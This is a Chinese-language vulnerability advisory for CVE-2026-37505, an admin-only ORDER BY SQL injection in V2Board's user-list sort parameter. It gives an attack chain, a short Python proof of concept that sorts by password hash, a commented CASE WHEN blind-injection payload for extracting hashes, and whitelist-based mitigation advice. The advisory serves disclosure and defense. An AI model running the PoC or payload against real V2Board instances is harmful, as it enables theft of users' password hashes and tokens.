CVE-2026-37505: V2Board SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-37505

漏洞类型

SQL注入

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

V2Board

漏洞概述

V2Board 在版本 1.7.4 及之前的版本中存在 SQL 注入漏洞。该漏洞位于 `app/Http/Controllers/Admin/UserController.php` 文件中，由于未对用户输入的 `sort` 参数进行充分验证，导致其被直接传递给 `User::orderBy` 方法。经过身份验证的管理员可以利用此漏洞通过 ORDER BY 子句对敏感数据库列（如密码哈希、remember_token）进行排序，从而通过排序分析导致信息泄露，尽管无法直接回显 SQL 查询结果，但侧信道攻击仍可获取敏感信息。

技术细节

该漏洞的根本原因在于 V2Board 后端的用户排序功能缺乏严格的输入白名单验证。在 `app/Http/Controllers/Admin/UserController.php` 控制器中，程序直接接收前端传递的 `sort` 和 `sortType` 参数，并将其动态拼接到 Laravel 的 Eloquent ORM 查询构建器的 `orderBy` 方法中。尽管使用了 ORM，但在处理动态列名时，Laravel 默认不会对列名进行转义，导致 `orderBy` 子句存在 SQL 注入风险。由于 CVSS 评分显示 `PR:H`（高权限），攻击者必须拥有管理员账户才可利用此漏洞。攻击者无法直接执行 `UNION SELECT` 或通过网络回显获取敏感数据，但可以通过构造恶意的 `sort` 参数（指向 `password`、`remember_token` 等敏感字段），结合布尔盲注或基于时间的侧信道技术。通过观察页面排序结果的顺序变化或响应时间的微小差异，攻击者可以逐字节推断出数据库中的敏感哈希值。这种基于排序的 SQL 注入属于一种特殊的盲注，利用了数据库排序机制来进行信息泄露。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统使用的是 V2Board，并确认版本在 1.7.4 或以下。

STEP 2

步骤2：获取高权限账号

由于漏洞需要高权限（PR:H），攻击者通过钓鱼、暴力破解或其他漏洞获取管理员账号凭证。

STEP 3

步骤3：发送恶意请求

攻击者使用管理员权限向后端接口发送请求，在 `sort` 参数中注入敏感字段名（如 password）或布尔表达式。

STEP 4

步骤4：数据窃取

分析返回的用户列表排序顺序或响应时间，利用盲注技术逐步推断出数据库中的敏感信息（如用户密码哈希）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "https://example.com/api/admin/user/getUsers"
# Admin cookie/token is required (PR:H)
headers = {
    "Authorization": "Bearer <admin_token>"
}

# Vulnerable payload: Sorting by password hash
# This allows an attacker to see the order of password hashes,
# facilitating analysis or blind extraction.
params = {
    "page": 1,
    "sort": "password",  # Malicious parameter injection
    "sortType": "asc"
}

response = requests.get(target_url, headers=headers, params=params)
print("Status Code:", response.status_code)
print("Response:", response.json())

# Advanced PoC concept for Blind SQLi via Order By:
# Using CASE WHEN to infer data based on response time or ordering
# payload = "(CASE WHEN (SELECT SUBSTRING(password,1,1) FROM users WHERE id=1)='a' THEN id ELSE password END)"
# params['sort'] = payload

影响范围

V2Board <= 1.7.4

防御指南

临时缓解措施

建议立即升级 V2Board 至最新版本。如果无法立即升级，应在 `UserController.php` 中对 `sort` 参数进行严格的白名单校验，仅允许预定义的安全字段（如 `id`, `created_at`）进行排序，禁止直接使用用户输入作为数据库列名。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-37505
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-37505
3 Details https://www.cvedetails.com/cve/CVE-2026-37505/
4 VulDB https://vuldb.com/cve/CVE-2026-37505
5 Link https://gist.github.com/sgInnora/1330e1a82caa79906eec55eeff2c99b9
6 Link https://github.com/v2board/v2board